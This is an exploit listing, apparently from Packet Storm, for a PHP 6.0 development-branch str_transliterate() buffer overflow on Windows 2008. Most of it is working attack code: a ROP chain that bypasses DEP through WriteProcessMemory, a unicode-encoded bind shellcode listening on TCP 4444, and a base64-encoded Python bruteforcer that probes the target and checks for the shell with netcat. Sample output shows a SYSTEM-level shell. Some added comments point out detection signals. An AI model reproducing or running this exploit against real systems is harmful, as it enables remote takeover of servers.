
PHP 6.0 Dev str_transliterate() Buffer Overflow

Published 14 Apr 2010. Reported by Matteo Memelli. Type: packetstorm.

PHP 6.0 Dev str_transliterate() Buffer Overflow Exploit

Code
`<?php  
/*  
04-06-2010 PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit  
Tested on Windows 2008 SP1 DEP alwayson  
Matteo Memelli aka ryujin ( AT ) offsec.com  
original sploit: http://www.exploit-db.com/exploits/12051 (Author: Pr0T3cT10n)  
  
Thx to muts and Elwood for helping ;)  
  
Bruteforce script is attached in base64 format.  
  
root@bt:~# ./brute_php6.py 172.16.30.249 /pwnPhp6.php win2k8  
(*) Php6 str_transliterate() bof || ryujin # offsec.com  
(*) Bruteforcing WPM ret address...  
(+) Trying base address 0x78000000  
(+) Trying base address 0x77000000  
(+) Trying base address 0x76000000  
(+) Trying base address 0x75000000  
Microsoft Windows [Version 6.0.6001]  
Copyright (c) 2006 Microsoft Corporation. All rights reserved.  
  
C:\wamp\bin\apache\Apache2.2.11>whoami  
whoami  
nt authority\system  
*/  
  
// Silences every diagnostic: a failed or crashing attempt leaves no PHP error  
// in the response body or the error log, so nothing in PHP's own output  
// distinguishes a probe from a normal request.  
error_reporting(0);  
  
// Four request-controlled values, read without validation. Each one only  
// reaches the script through dechex() below, which coerces it to an int and  
// emits hex digits, so the two hex pairs per value are all that survives.  
$base_s = $_GET['pos_s'];  
$base_e = $_GET['pos_e'];  
$off_s = $_GET['off_s'];  
$off_e = $_GET['off_e'];  
  
// 'unicode.semantics' and the "\uXXXX" string escapes belong to the unreleased  
// PHP 6 development branch. On released PHP the directive does not exist,  
// ini_get_bool() falls through to its default branch and returns false, and  
// the else branch below exits before any of this runs.  
if(ini_get_bool('unicode.semantics')) {  
$buff = str_repeat("\u4141", 32);  
$tbp = "\u2650\u6EE5"; // 6EE52650 ADDRESS TO BE PATCHED BY WPM  
$ptw = "\u2FE0\u6EE5"; // 6EE52FE0 POINTER FOR WRITTEN BYTES  
$ret = "\u2660\u6EE5"; // 6EE52660 RET AFTER WPM  
$wpmargs = $ret."\uFFFF\uFFFF".$tbp."\uFFFF\uFFFF\uFFFF\uFFFF".$ptw; // WPM ARGS  
// Assembles the PHP source for a "\uXXXX\uXXXX" escape from the four request  
// values and eval()s it; $wpm exists only because of this eval. dechex()  
// limits the evaluated text to hex digits, but eval() on request-derived  
// text is the pattern a reviewer flags regardless of what else the page does.  
$garbage = "\$wpm = \"\\u".strtoupper(sprintf("%02s", dechex($off_s))).strtoupper(sprintf("%02s", dechex($off_e))).  
"\\u".strtoupper(sprintf("%02s", dechex($base_s))).strtoupper(sprintf("%02s", dechex($base_e)))."\";";  
eval($garbage);  
$nops = str_repeat("\u9090", 41);  
  
// TH || ROP -> Try Harder or Rest On Pain ;)  
// GETTING SHELLCODE ABSOLUTE ADDRESS  
$rop = "\u40dd\u6FF2"; // MOV EAX,EBP/POP ESI/POP EBP/POP EBX/RETN 6FF240DD  
$rop .= "\u4242\u4242"; // JUNK POPPED IN EBP   
$rop .= "\u4242\u4242"; // JUNK POPPED IN EBP   
$rop .= "\u4242\u4242"; // JUNK POPPED IN EBP   
$rop .= "\u5DD4\u6EE6"; // POP ECX/RETN 6EE65DD4   
$rop .= "\uFDBC\uFFFF"; // VALUE TO BE POPPED IN ECX (REL. OFFSET TO SHELLCODE) FFFFFDBC  
$rop .= "\u222B\u6EED"; // ADD EAX,ECX/POP EBX/POP EBP/RETN 6EED222B   
$rop .= "\u2650\u6EE5"; // JUNK POPPED IN EBP (RET TO SHELLCODE)  
$rop .= "\u2650\u6EE5"; // JUNK POPPED IN EBP (RET TO SHELLCODE)  
  
// PATCHING BUFFER ADDY ARG FOR WPM  
$rop .= "\u1C13\u6EE6"; // ADD DWORD PTR DS:[EAX],EAX/RETN 6EE61C13  
  
// GETTING NUM BYTES IN REGISTER 0x1A0 (LEN OF SHELLCODE)  
$rop .= "\uE94E\u6EE6"; // MOV EDX,ECX/POP EBP/RETN 6EE6E94E   
$rop .= "\u4242\u4242"; // JUNK POPPED IN EBP  
$rop .= "\u5DD4\u6EE6"; // POP ECX/RETN 6EE65DD4  
$rop .= "\uFF5C\uFFFF"; // VALUE TO BE POPPED IN ECX FFFFFF5C  
$rop .= "\uE94C\u6EE6"; // SUB ECX,EDX/MOV EDX,ECX/POP EBP/RETN 6EE6E94C  
$rop .= "\u4242\u4242"; // JUNK POPPED IN EBP  
  
// PATCHING NUM BYTES TO BE COPIED ARG FOR WPM  
$rop .= "\u0C54\u6EE7"; // MOV DWORD PTR DS:[EAX+4],ECX/POP EBP/RETN 6EE70C54  
$rop .= "\u4242\u4242"; // JUNK POPPED IN EBP   
  
// REALIGNING ESP TO WPM AND RETURNING TO IT  
$rop .= "\u8640\u6EE6"; // ADD EAX,-30/POP EBP/RETN 6EE68640  
$rop .= "\u4242\u4242"; // JUNK POPPED IN EBP  
$rop .= "\u29F1\u6EE6"; // ADD EAX,0C/POP EBP/RETN 6EE629F1  
$rop .= "\u4242\u4242"; // JUNK POPPED IN EBP  
$rop .= "\u29F1\u6EE6"; // ADD EAX,0C/POP EBP/RETN 6EE629F1  
$rop .= "\u4242\u4242"; // JUNK POPPED IN EBP  
$rop .= "\u10AD\u6FC3"; // INC EAX/RETN 6FC310AD  
$rop .= "\u10AD\u6FC3"; // INC EAX/RETN 6FC310AD  
$rop .= "\u10AD\u6FC3"; // INC EAX/RETN 6FC310AD  
$rop .= "\u10AD\u6FC3"; // INC EAX/RETN 6FC310AD  
$rop .= "\u10AD\u6FC3"; // INC EAX/RETN 6FC310AD  
$rop .= "\u10AD\u6FC3"; // INC EAX/RETN 6FC310AD  
$rop .= "\u10AD\u6FC3"; // INC EAX/RETN 6FC310AD  
$rop .= "\u10AD\u6FC3"; // INC EAX/RETN 6FC310AD  
$rop .= "\u2C63\u6FC5"; // XCHG EAX,ESP/RETN 6FC52C63  
  
  
  
// unicode bind shellcode port 4444, 318 bytes  
// Observable outcome on a compromised host: a new listener on TCP 4444 under  
// the web server's account (the transcript above shows NT AUTHORITY\SYSTEM).  
// The base64 helper in the trailing comment appears to check that port after  
// each request, so the request burst plus a new listener is the detection pair.  
$sh = "\u6afc\u4deb\uf9e8\uffff\u60ff\u6c8b\u2424\u458b\u8b3c\u057c\u0178\u8bef\u184f\u5f8b".  
"\u0120\u49eb\u348b\u018b\u31ee\u99c0\u84ac\u74c0\uc107\u0dca\uc201\uf4eb\u543b\u2824".  
"\ue575\u5f8b\u0124\u66eb\u0c8b\u8b4b\u1c5f\ueb01\u2c03\u898b\u246c\u611c\u31c3\u64db".  
"\u438b\u8b30\u0c40\u708b\uad1c\u408b\u5e08\u8e68\u0e4e\u50ec\ud6ff\u5366\u6866\u3233".  
"\u7768\u3273\u545f\ud0ff\ucb68\ufced\u503b\ud6ff\u895f\u66e5\ued81\u0208\u6a55\uff02".  
"\u68d0\u09d9\uadf5\uff57\u53d6\u5353\u5353\u5343\u5343\ud0ff\u6866\u5c11\u5366\ue189".  
"\u6895\u1aa4\uc770\uff57\u6ad6\u5110\uff55\u68d0\uada4\ue92e\uff57\u53d6\uff55\u68d0".  
"\u49e5\u4986\uff57\u50d6\u5454\uff55\u93d0\ue768\uc679\u5779\ud6ff\uff55\u66d0\u646a".  
"\u6866\u6d63\ue589\u506a\u2959\u89cc\u6ae7\u8944\u31e2\uf3c0\ufeaa\u2d42\u42fe\u932c".  
"\u7a8d\uab38\uabab\u7268\ub3fe\uff16\u4475\ud6ff\u575b\u5152\u5151\u016a\u5151\u5155".  
"\ud0ff\uad68\u05d9\u53ce\ud6ff\uff6a\u37ff\ud0ff\u578b\u83fc\u64c4\ud6ff\uff52\u68d0".  
"\uceef\u60e0\uff53\uffd6\ud0d0\u4142\u4344\u4142\u4344\u4142\u4344\u4142\u4344";  
  
// Concatenation order is the whole point: $wpm (defined only by the eval()  
// above) sits between the return address and its arguments.  
$exploit = $buff.$ret.$wpm.$wpmargs.$nops.$sh.$rop;  
// The vulnerable call; the assembled string is passed as the text to transliterate.  
str_transliterate(0, $exploit, 0);  
} else {  
exit("Error! 'unicode.semantics' has be on!\r\n");  
}  
  
/**
 * Read an ini directive and interpret its value as a boolean.
 *
 * "on", "yes" and "true" count as enabled (except for assert.active, which
 * this helper reports as disabled), "stdout"/"stderr" count as enabled only
 * for display_errors, and anything else is cast through int — so an unknown
 * directive (ini_get() returns false) yields false.
 *
 * @param string $a ini directive name
 * @return bool
 */
function ini_get_bool($a) {  
$raw = ini_get($a);  
$word = strtolower($raw);  
if ($word === 'on' || $word === 'yes' || $word === 'true') {  
// assert.active is the one directive whose "on" words are reported as false  
return $a !== 'assert.active';  
}  
if ($word === 'stdout' || $word === 'stderr') {  
// stream names are only meaningful for display_errors  
return $a === 'display_errors';  
}  
return (bool) (int) $raw;  
}  
  
/*  
IyEvdXNyL2Jpbi9weXRob24KaW1wb3J0IHN5cywgcmFuZG9tLCBvcywgdGltZSwgdXJsbGliCmlt  
cG9ydCBzb2NrZXQgCgp0YXJnZXRzID0geyd3aW4yazgnOiBbMHgxQywgMHhDNl0sIH0KdGltZW91  
dCA9IDAuMQpzb2NrZXQuc2V0ZGVmYXVsdHRpbWVvdXQodGltZW91dCkKCnRyeToKICAgaG9zdCAg  
ICAgPSBzeXMuYXJndlsxXQogICBwYXRoICAgICA9IHN5cy5hcmd2WzJdCiAgIHRhcmdldCAgID0g  
c3lzLmFyZ3ZbM10KZXhjZXB0IEluZGV4RXJyb3I6CiAgIHByaW50ICJVc2FnZTogJXMgaG9zdCBw  
YXRoIHRhcmdldCIgJSBzeXMuYXJndlswXQogICBwcmludCAiRXhhbXBsZTogJXMgMTcyLjE2LjMw  
LjI0OSAvIHdpbjJrOCIgJSBzeXMuYXJndlswXQogICBwcmludCAiU3VwcG9ydGVkIHRhcmdldHM6  
IFdpbmRvd3MgMjAwOCBTUDE6IHdpbjJrOCIKICAgc3lzLmV4aXQoKQoKaWYgdGFyZ2V0IG5vdCBp  
biB0YXJnZXRzOgogICBwcmludCAiVGFyZ2V0IG5vdCBzdXBwb3J0ZWQhIgogICBzeXMuZXhpdCgp  
CmVsc2U6CiAgIHRhcmdldF9hX3MsIHRhcmdldF9hX2UgPSB0YXJnZXRzW3RhcmdldF1bMF0sIHRh  
cmdldHNbdGFyZ2V0XVsxXQoKZGVmIHNlbmRSZXF1ZXN0KGksayk6CiAgIHBhcmFtcyA9IHVybGxp  
Yi51cmxlbmNvZGUoeydwb3NfZSc6IGksICdwb3Nfcyc6IGssICdvZmZfcyc6IHRhcmdldF9hX3Ms  
IAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnb2ZmX2UnOiB0YXJnZXRfYV9lLCAncm5k  
Jzogc3RyKGludChyYW5kb20ucmFuZG9tKCkpKSx9KQogICB0cnk6CiAgICAgIGYgPSB1cmxsaWIu  
dXJsb3BlbigiaHR0cDovLyVzJXM/JXMiICUgKGhvc3QsIHBhdGgsIHBhcmFtcykpCiAgICAgIHBy  
aW50IGYucmVhZCgpCiAgIGV4Y2VwdCBJT0Vycm9yOgogICAgICBwYXNzCgppZiBfX25hbWVfXyA9  
PSAnX19tYWluX18nOgogICBwcmludCAiKCopIFBocDYgc3RyX3RyYW5zbGl0ZXJhdGUoKSBib2Yg  
fHwgcnl1amluICMgb2Zmc2VjLmNvbSIKICAgcHJpbnQgIigqKSBCcnV0ZWZvcmNpbmcgV3JpdGVQ  
cm9jZXNzTWVtb3J5IHJldCBhZGRyZXNzLi4uIgogICBiID0gcmFuZ2UoMTEyLDEyMSkKICAgYi5y  
ZXZlcnNlKCkKICAgZm9yIGsgaW4gYjoKICAgICAgcHJpbnQgIigrKSBUcnlpbmcgYmFzZSBhZGRy  
ZXNzIDB4JXgwMDAwMDAiICUgayAKICAgICAgZm9yIGkgaW4gcmFuZ2UoMSwyNTYpOgogICAgICAg  
ICBzZW5kUmVxdWVzdChpLGspCiAgICAgICAgIGlmIG9zLnN5c3RlbSgibmMgLXZuICVzIDQ0NDQg  
Mj4vZGV2L251bGwiICUgaG9zdCkgPT0gMDoKICAgICAgICAgICAgYnJlYWsKICAgICAgICAgdGlt  
ZS5zbGVlcCgwLjA1KSAK  
*/  
?>  
`
